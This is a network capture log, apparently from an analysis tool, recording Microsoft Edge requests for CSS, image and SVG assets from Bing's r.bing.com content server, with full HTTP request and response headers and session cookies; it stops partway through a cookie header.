User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
Accept: text/css,*/*;q=0.1
Sec-Fetch-Site: same-site
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: style
Referer: https://www.bing.com/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cookie: MUID=05879ADD3EF86D540F588FD23FDB6C78; _EDGE_S=F=1&SID=1FD780794ED66EF4059195764FF56FEA; _EDGE_V=1; USRLOC=HS=1; _SS=PC=U531&SID=1FD780794ED66EF4059195764FF56FEA; SRCHS=PC=U531; SRCHD=AF=ANAB01; SRCHUID=V=2&GUID=1AF05D2DD4AB4219A140FE95E3A457CC&dmnchg=1; SRCHUSR=DOB=20241005; SRCHHPGUSR=SRCHLANG=en; ak_bmsc=74116A38A2F084E1E43A26BF6C15EE40~000000000000000000000000000000~YAAQvXd7XOYY4kqSAQAAFr1tXRm1JniIRyh/3p+xj2CC8APwbuFJl8AZ0QOdGOYWvUNf1SkjmK1S2Q6qI60vy31DuGuEYXXk94vDVI1AqG5vUmM1VoynGYvEBI4eQU9fi+7yl2iSMaFc+k5OIaZW0sxl1bRdnR5e2QKu83RdE5Dhz8jkkGRnGdxoqYjgHbBZmTaEAD5bXQOH9Xyj8fzxOuxU30Dr3CNfUHUD67ViGx/IcQ55cCFHLN5BE5l/mLItR7YuJ3FeZFbRXHhVSokcv7QBoaLDevdd77hGTLaQaFZScZeSH6YrtjorItriSkCjfEfErGAfSfISonkpitsrqfvUUHqY85wayL6FwtHVAGdsEQlIyJ0sOPdtx/aF7FE=

Response

HTTP/1.1 200 OK

Content-Length: 92
Content-Type: text/css
Content-Encoding: br
Content-MD5: VF2Z/zrRUcw1CZI+EQMEgA==
Last-Modified: Tue, 24 Sep 2024 06:43:05 GMT
ETag: 0x8DCDC6425428C34
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: bbafdca6-e01e-0032-5213-15b240000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Access-Control-Allow-Origin: *
Cache-Control: public, no-transform, max-age=192655
Expires: Mon, 07 Oct 2024 21:36:24 GMT
Date: Sat, 05 Oct 2024 16:05:29 GMT
Connection: keep-alive
Alt-Svc: h3=":443"; ma=93600
Akamai-GRN: 0.a4777b5c.1728144329.f097523
Timing-Allow-Origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/rp/BAy11H3wRXaRcm85yqz4_tjE_U8.br.css

msedge.exe

Remote address:

92.123.128.164:443

Request

GET /rp/BAy11H3wRXaRcm85yqz4_tjE_U8.br.css HTTP/1.1
Host: r.bing.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
Accept: text/css,*/*;q=0.1
Sec-Fetch-Site: same-site
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: style
Referer: https://www.bing.com/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cookie: MUID=05879ADD3EF86D540F588FD23FDB6C78; _EDGE_S=F=1&SID=1FD780794ED66EF4059195764FF56FEA; _EDGE_V=1; USRLOC=HS=1; _SS=PC=U531&SID=1FD780794ED66EF4059195764FF56FEA; SRCHS=PC=U531; SRCHD=AF=ANAB01; SRCHUID=V=2&GUID=1AF05D2DD4AB4219A140FE95E3A457CC&dmnchg=1; SRCHUSR=DOB=20241005; SRCHHPGUSR=SRCHLANG=en; ak_bmsc=74116A38A2F084E1E43A26BF6C15EE40~000000000000000000000000000000~YAAQvXd7XOYY4kqSAQAAFr1tXRm1JniIRyh/3p+xj2CC8APwbuFJl8AZ0QOdGOYWvUNf1SkjmK1S2Q6qI60vy31DuGuEYXXk94vDVI1AqG5vUmM1VoynGYvEBI4eQU9fi+7yl2iSMaFc+k5OIaZW0sxl1bRdnR5e2QKu83RdE5Dhz8jkkGRnGdxoqYjgHbBZmTaEAD5bXQOH9Xyj8fzxOuxU30Dr3CNfUHUD67ViGx/IcQ55cCFHLN5BE5l/mLItR7YuJ3FeZFbRXHhVSokcv7QBoaLDevdd77hGTLaQaFZScZeSH6YrtjorItriSkCjfEfErGAfSfISonkpitsrqfvUUHqY85wayL6FwtHVAGdsEQlIyJ0sOPdtx/aF7FE=

Response

HTTP/1.1 200 OK

Content-Length: 118
Content-Type: text/css; charset=utf-8
Content-Encoding: br
Content-MD5: 6wYw3u/GPs1Cw4KBLjFI7Q==
Last-Modified: Thu, 20 Jul 2023 21:36:45 GMT
ETag: 0x8DB89696ACC681E
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: b7145866-301e-0055-351b-051427000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Access-Control-Allow-Origin: *
Cache-Control: public, no-transform, max-age=56713
Expires: Sun, 06 Oct 2024 07:50:42 GMT
Date: Sat, 05 Oct 2024 16:05:29 GMT
Connection: keep-alive
Alt-Svc: h3=":443"; ma=93600
Akamai-GRN: 0.a4777b5c.1728144329.f097705
Timing-Allow-Origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/rp/sd09ZoqYFtYgki8gbUcaMRzc1N4.br.css

msedge.exe

Remote address:

92.123.128.164:443

Request

GET /rp/sd09ZoqYFtYgki8gbUcaMRzc1N4.br.css HTTP/1.1
Host: r.bing.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
Accept: text/css,*/*;q=0.1
Sec-Fetch-Site: same-site
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: style
Referer: https://www.bing.com/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cookie: MUID=05879ADD3EF86D540F588FD23FDB6C78; _EDGE_S=F=1&SID=1FD780794ED66EF4059195764FF56FEA; _EDGE_V=1; USRLOC=HS=1; _SS=PC=U531&SID=1FD780794ED66EF4059195764FF56FEA; SRCHS=PC=U531; SRCHD=AF=ANAB01; SRCHUID=V=2&GUID=1AF05D2DD4AB4219A140FE95E3A457CC&dmnchg=1; SRCHUSR=DOB=20241005; SRCHHPGUSR=SRCHLANG=en; ak_bmsc=74116A38A2F084E1E43A26BF6C15EE40~000000000000000000000000000000~YAAQvXd7XOYY4kqSAQAAFr1tXRm1JniIRyh/3p+xj2CC8APwbuFJl8AZ0QOdGOYWvUNf1SkjmK1S2Q6qI60vy31DuGuEYXXk94vDVI1AqG5vUmM1VoynGYvEBI4eQU9fi+7yl2iSMaFc+k5OIaZW0sxl1bRdnR5e2QKu83RdE5Dhz8jkkGRnGdxoqYjgHbBZmTaEAD5bXQOH9Xyj8fzxOuxU30Dr3CNfUHUD67ViGx/IcQ55cCFHLN5BE5l/mLItR7YuJ3FeZFbRXHhVSokcv7QBoaLDevdd77hGTLaQaFZScZeSH6YrtjorItriSkCjfEfErGAfSfISonkpitsrqfvUUHqY85wayL6FwtHVAGdsEQlIyJ0sOPdtx/aF7FE=

Response

HTTP/1.1 200 OK

Last-Modified: Wed, 17 Aug 2022 06:53:13 GMT
ETag: 0x8DA801D27D2D8E7
Content-Length: 66
Content-Type: text/css; charset=utf-8
Content-Encoding: br
Content-MD5: YEUwB9iLo0daX99OGxDp6A==
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: fa74a86e-301e-007a-4dcc-a619ec000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Access-Control-Allow-Origin: *
Cache-Control: public, no-transform, max-age=376994
Expires: Thu, 10 Oct 2024 00:48:43 GMT
Date: Sat, 05 Oct 2024 16:05:29 GMT
Connection: keep-alive
Alt-Svc: h3=":443"; ma=93600
Akamai-GRN: 0.a4777b5c.1728144329.f09788c
Timing-Allow-Origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/rp/KC_nX2_tPPyFvVw1RK20Yu1FyDk.svg

msedge.exe

Remote address:

92.123.128.164:443

Request

GET /rp/KC_nX2_tPPyFvVw1RK20Yu1FyDk.svg HTTP/1.1
Host: r.bing.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Sec-Fetch-Site: same-site
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: image
Referer: https://www.bing.com/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cookie: MUID=05879ADD3EF86D540F588FD23FDB6C78; _EDGE_S=F=1&SID=1FD780794ED66EF4059195764FF56FEA; _EDGE_V=1; SRCHS=PC=U531; SRCHD=AF=ANAB01; SRCHUID=V=2&GUID=1AF05D2DD4AB4219A140FE95E3A457CC&dmnchg=1; ak_bmsc=74116A38A2F084E1E43A26BF6C15EE40~000000000000000000000000000000~YAAQvXd7XOYY4kqSAQAAFr1tXRm1JniIRyh/3p+xj2CC8APwbuFJl8AZ0QOdGOYWvUNf1SkjmK1S2Q6qI60vy31DuGuEYXXk94vDVI1AqG5vUmM1VoynGYvEBI4eQU9fi+7yl2iSMaFc+k5OIaZW0sxl1bRdnR5e2QKu83RdE5Dhz8jkkGRnGdxoqYjgHbBZmTaEAD5bXQOH9Xyj8fzxOuxU30Dr3CNfUHUD67ViGx/IcQ55cCFHLN5BE5l/mLItR7YuJ3FeZFbRXHhVSokcv7QBoaLDevdd77hGTLaQaFZScZeSH6YrtjorItriSkCjfEfErGAfSfISonkpitsrqfvUUHqY85wayL6FwtHVAGdsEQlIyJ0sOPdtx/aF7FE=; SRCHUSR=DOB=20241005&T=1728144325000; _C_ETH=1; _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-10-05T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-05T16:05:32.8363002+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=; _Rwho=u=d&ts=2024-10-05; _SS=PC=U531&SID=1FD780794ED66EF4059195764FF56FEA&R=3&RB=0&GB=0&RG=200&RP=0; SRCHHPGUSR=SRCHLANG=en&HV=1728144332&DM=0&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=498&DPR=1.0&UTC=0&PV=10.0; USRLOC=HS=1&BLOCK=TS=241005160532

Response

HTTP/1.1 200 OK

Last-Modified: Mon, 15 Aug 2022 17:39:27 GMT
ETag: 0x8DA7EE519EF54EF
Akamai-GRN: 0.19fd4817.1699775190.19e2dda6
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
Content-Length: 726
Content-Type: image/svg+xml
Content-MD5: ZgHkolq4RyA+EBWzJRSxbA==
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: d46b8e76-f01e-0020-517e-0a9bf6000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Access-Control-Allow-Origin: *
Akamai-GRN: 0.1efd4817.1701123842.3b4e7f5b
Cache-Control: public, no-transform, max-age=8779114
Expires: Wed, 15 Jan 2025 06:44:07 GMT
Date: Sat, 05 Oct 2024 16:05:33 GMT
Connection: keep-alive
Alt-Svc: h3=":443"; ma=93600
Akamai-GRN: 0.a4777b5c.1728144333.f097a93
Timing-Allow-Origin: *
GET

https://r.bing.com/rp/dbmNS45xQvD1diApY1T2HExvOo8.jpg

msedge.exe

Remote address:

92.123.128.164:443

Request

GET /rp/dbmNS45xQvD1diApY1T2HExvOo8.jpg HTTP/1.1
Host: r.bing.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Sec-Fetch-Site: same-site
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: image
Referer: https://www.bing.com/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cookie: MUID=05879ADD3EF86D540F588FD23FDB6C78; _EDGE_S=F=1&SID=1FD780794ED66EF4059195764FF56FEA; _EDGE_V=1; SRCHS=PC=U531; SRCHD=AF=ANAB01; SRCHUID=V=2&GUID=1AF05D2DD4AB4219A140FE95E3A457CC&dmnchg=1; ak_bmsc=74116A38A2F084E1E43A26BF6C15EE40~000000000000000000000000000000~YAAQvXd7XOYY4kqSAQAAFr1tXRm1JniIRyh/3p+xj2CC8APwbuFJl8AZ0QOdGOYWvUNf1SkjmK1S2Q6qI60vy31DuGuEYXXk94vDVI1AqG5vUmM1VoynGYvEBI4eQU9fi+7yl2iSMaFc+k5OIaZW0sxl1bRdnR5e2QKu83RdE5Dhz8jkkGRnGdxoqYjgHbBZmTaEAD5bXQOH9Xyj8fzxOuxU30Dr3CNfUHUD67ViGx/IcQ55cCFHLN5BE5l/mLItR7YuJ3FeZFbRXHhVSokcv7QBoaLDevdd77hGTLaQaFZScZeSH6YrtjorItriSkCjfEfErGAfSfISonkpitsrqfvUUHqY85wayL6FwtHVAGdsEQlIyJ0sOPdtx/aF7FE=; SRCHUSR=DOB=20241005&T=1728144325000; _C_ETH=1; _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-10-05T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-05T16:05:32.8363002+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=; _Rwho=u=d&ts=2024-10-05; _SS=PC=U531&SID=1FD780794ED66EF4059195764FF56FEA&R=3&RB=0&GB=0&RG=200&RP=0; SRCHHPGUSR=SRCHLANG=en&HV=1728144332&DM=0&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=498&DPR=1.0&UTC=0&PV=10.0; USRLOC=HS=1&BLOCK=TS=241005160532

Response

HTTP/1.1 200 OK

Content-Length: 4934
Content-Type: image/jpeg
Content-MD5: /aLOrgZ5YRk35ucfcBo2qw==
Last-Modified: Tue, 24 Sep 2024 06:43:17 GMT
ETag: 0x8DCDC642C51AEC8
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: eb80deab-601e-0023-48af-16855b000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Access-Control-Allow-Origin: *
Cache-Control: public, no-transform, max-age=369957
Expires: Wed, 09 Oct 2024 22:51:30 GMT
Date: Sat, 05 Oct 2024 16:05:33 GMT
Connection: keep-alive
Alt-Svc: h3=":443"; ma=93600
Akamai-GRN: 0.a4777b5c.1728144333.f099a0f
Timing-Allow-Origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/rp/RuJsq8eAYqkavNQ_kj9tyr6ZZ4U.br.css

msedge.exe

Remote address:

92.123.128.164:443

Request

GET /rp/RuJsq8eAYqkavNQ_kj9tyr6ZZ4U.br.css HTTP/1.1
Host: r.bing.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
Accept: text/css,*/*;q=0.1
Sec-Fetch-Site: same-site
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: style
Referer: https://www.bing.com/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cookie: MUID=05879ADD3EF86D540F588FD23FDB6C78; _EDGE_V=1; SRCHS=PC=U531; SRCHD=AF=ANAB01; SRCHUID=V=2&GUID=1AF05D2DD4AB4219A140FE95E3A457CC&dmnchg=1; ak_bmsc=74116A38A2F084E1E43A26BF6C15EE40~000000000000000000000000000000~YAAQvXd7XOYY4kqSAQAAFr1tXRm1JniIRyh/3p+xj2CC8APwbuFJl8AZ0QOdGOYWvUNf1SkjmK1S2Q6qI60vy31DuGuEYXXk94vDVI1AqG5vUmM1VoynGYvEBI4eQU9fi+7yl2iSMaFc+k5OIaZW0sxl1bRdnR5e2QKu83RdE5Dhz8jkkGRnGdxoqYjgHbBZmTaEAD5bXQOH9Xyj8fzxOuxU30Dr3CNfUHUD67ViGx/IcQ55cCFHLN5BE5l/mLItR7YuJ3FeZFbRXHhVSokcv7QBoaLDevdd77hGTLaQaFZScZeSH6YrtjorItriSkCjfEfErGAfSfISonkpitsrqfvUUHqY85wayL6FwtHVAGdsEQlIyJ0sOPdtx/aF7FE=; SRCHUSR=DOB=20241005&T=1728144325000; _C_ETH=1; _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-10-05T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-05T16:05:32.8363002+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=; _Rwho=u=d&ts=2024-10-05; _SS=PC=U531&SID=1FD780794ED66EF4059195764FF56FEA&R=3&RB=0&GB=0&RG=200&RP=0; USRLOC=HS=1&BLOCK=TS=241005160532; SRCHHPGUSR=SRCHLANG=en&HV=1728144332&DM=0&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=498&DPR=1.0&UTC=0&PV=10.0; _EDGE_S=F=1&SID=1FD780794ED66EF4059195764FF56FEA&mkt=nl-nl; ipv6=hit=1728147938444&t=4; bm_sv=0DEC9B29819DC3ABBF8D0CF2C33AC1E4~YAAQvXd7XCEc4kqSAQAAFhluXRkP3pHPMOMJR8xpE6m40xBEGZQq9h4J17KsvtYhfIc9MmSdHop+L8bNS+ikk5gbznoaPhCHGPEZ1UD4XiyZ4hiflICrg8RdI+KbBt2Ez4Eg4mzoB9LO8ADVCgLg1G4+xyOqIe08zfgSjNHhzLE30HtXgDvuzGdF39DTkqNMffb/ktSk3iWjaL1R5ar1Hck7Xg/Lvc8poGQ0dpWICy7igeDOJD4oxSEyTdZ/AA==~1

Response

HTTP/1.1 200 OK

Content-Length: 38
Content-Type: text/css
Content-Encoding: br
Content-MD5: ZqrU0/0vl0O9rAMCSR3HRg==
Last-Modified: Tue, 24 Sep 2024 06:24:09 GMT
ETag: 0x8DCDC617FF943E7
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: b56acb3d-901e-005b-7bb1-15edec000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Access-Control-Allow-Origin: *
Cache-Control: public, no-transform, max-age=260621
Expires: Tue, 08 Oct 2024 16:29:30 GMT
Date: Sat, 05 Oct 2024 16:05:49 GMT
Connection: keep-alive
Alt-Svc: h3=":443"; ma=93600
Akamai-GRN: 0.a4777b5c.1728144349.f099b4d
Timing-Allow-Origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/rp/-daH6PNAGaQg3qCzuka0kd2jKdY.br.css

msedge.exe

Remote address:

92.123.128.164:443

Request

GET /rp/-daH6PNAGaQg3qCzuka0kd2jKdY.br.css HTTP/1.1
Host: r.bing.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
Accept: text/css,*/*;q=0.1
Sec-Fetch-Site: same-site
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: style
Referer: https://www.bing.com/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cookie: MUID=05879ADD3EF86D540F588FD23FDB6C78; _EDGE_V=1; SRCHS=PC=U531; SRCHD=AF=ANAB01; SRCHUID=V=2&GUID=1AF05D2DD4AB4219A140FE95E3A457CC&dmnchg=1; ak_bmsc=74116A38A2F084E1E43A26BF6C15EE40~000000000000000000000000000000~YAAQvXd7XOYY4kqSAQAAFr1tXRm1JniIRyh/3p+xj2CC8APwbuFJl8AZ0QOdGOYWvUNf1SkjmK1S2Q6qI60vy31DuGuEYXXk94vDVI1AqG5vUmM1VoynGYvEBI4eQU9fi+7yl2iSMaFc+k5OIaZW0sxl1bRdnR5e2QKu83RdE5Dhz8jkkGRnGdxoqYjgHbBZmTaEAD5bXQOH9Xyj8fzxOuxU30Dr3CNfUHUD67ViGx/IcQ55cCFHLN5BE5l/mLItR7YuJ3FeZFbRXHhVSokcv7QBoaLDevdd77hGTLaQaFZScZeSH6YrtjorItriSkCjfEfErGAfSfISonkpitsrqfvUUHqY85wayL6FwtHVAGdsEQlIyJ0sOPdtx/aF7FE=; SRCHUSR=DOB=20241005&T=1728144325000; _C_ETH=1; _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-10-05T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-05T16:05:32.8363002+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=; _Rwho=u=d&ts=2024-10-05; _SS=PC=U531&SID=1FD780794ED66EF4059195764FF56FEA&R=3&RB=0&GB=0&RG=200&RP=0; USRLOC=HS=1&BLOCK=TS=241005160532; SRCHHPGUSR=SRCHLANG=en&HV=1728144332&DM=0&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=498&DPR=1.0&UTC=0&PV=10.0; _EDGE_S=F=1&SID=1FD780794ED66EF4059195764FF56FEA&mkt=nl-nl; ipv6=hit=1728147938444&t=4; bm_sv=0DEC9B29819DC3ABBF8D0CF2C33AC1E4~YAAQvXd7XCEc4kqSAQAAFhluXRkP3pHPMOMJR8xpE6m40xBEGZQq9h4J17KsvtYhfIc9MmSdHop+L8bNS+ikk5gbznoaPhCHGPEZ1UD4XiyZ4hiflICrg8RdI+KbBt2Ez4Eg4mzoB9LO8ADVCgLg1G4+xyOqIe08zfgSjNHhzLE30HtXgDvuzGdF39DTkqNMffb/ktSk3iWjaL1R5ar1Hck7Xg/Lvc8poGQ0dpWICy7igeDOJD4oxSEyTdZ/AA==~1

Response

HTTP/1.1 200 OK

Content-Length: 54
Content-Type: text/css
Content-Encoding: br
Content-MD5: og3PEyKNWJXw0RDX/cneKQ==
Last-Modified: Tue, 24 Sep 2024 05:39:17 GMT
ETag: 0x8DCDC5B3B0F54C4
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 4397d2cb-601e-006c-4e41-164143000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Access-Control-Allow-Origin: *
Cache-Control: public, no-transform, max-age=322423
Expires: Wed, 09 Oct 2024 09:39:32 GMT
Date: Sat, 05 Oct 2024 16:05:49 GMT
Connection: keep-alive
Alt-Svc: h3=":443"; ma=93600
Akamai-GRN: 0.a4777b5c.1728144349.f0a1f9a
Timing-Allow-Origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/rp/gQ1jxIQABGnYmoqYi1itol2s4Nc.br.css

msedge.exe

Remote address:

92.123.128.164:443

Request

GET /rp/gQ1jxIQABGnYmoqYi1itol2s4Nc.br.css HTTP/1.1
Host: r.bing.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
Accept: text/css,*/*;q=0.1
Sec-Fetch-Site: same-site
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: style
Referer: https://www.bing.com/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cookie: MUID=05879ADD3EF86D540F588FD23FDB6C78; _EDGE_V=1; SRCHS=PC=U531; SRCHD=AF=ANAB01; SRCHUID=V=2&GUID=1AF05D2DD4AB4219A140FE95E3A457CC&dmnchg=1; ak_bmsc=74116A38A2F084E1E43A26BF6C15EE40~000000000000000000000000000000~YAAQvXd7XOYY4kqSAQAAFr1tXRm1JniIRyh/3p+xj2CC8APwbuFJl8AZ0QOdGOYWvUNf1SkjmK1S2Q6qI60vy31DuGuEYXXk94vDVI1AqG5vUmM1VoynGYvEBI4eQU9fi+7yl2iSMaFc+k5OIaZW0sxl1bRdnR5e2QKu83RdE5Dhz8jkkGRnGdxoqYjgHbBZmTaEAD5bXQOH9Xyj8fzxOuxU30Dr3CNfUHUD67ViGx/IcQ55cCFHLN5BE5l/mLItR7YuJ3FeZFbRXHhVSokcv7QBoaLDevdd77hGTLaQaFZScZeSH6YrtjorItriSkCjfEfErGAfSfISonkpitsrqfvUUHqY85wayL6FwtHVAGdsEQlIyJ0sOPdtx/aF7FE=; SRCHUSR=DOB=20241005&T=1728144325000; _C_ETH=1; _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-10-05T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-05T16:05:32.8363002+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=; _Rwho=u=d&ts=2024-10-05; _SS=PC=U531&SID=1FD780794ED66EF4059195764FF56FEA&R=3&RB=0&GB=0&RG=200&RP=0; USRLOC=HS=1&BLOCK=TS=241005160532; SRCHHPGUSR=SRCHLANG=en&HV=1728144332&DM=0&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=498&DPR=1.0&UTC=0&PV=10.0; _EDGE_S=F=1&SID=1FD780794ED66EF4059195764FF56FEA&mkt=nl-nl; ipv6=hit=1728147938444&t=4; 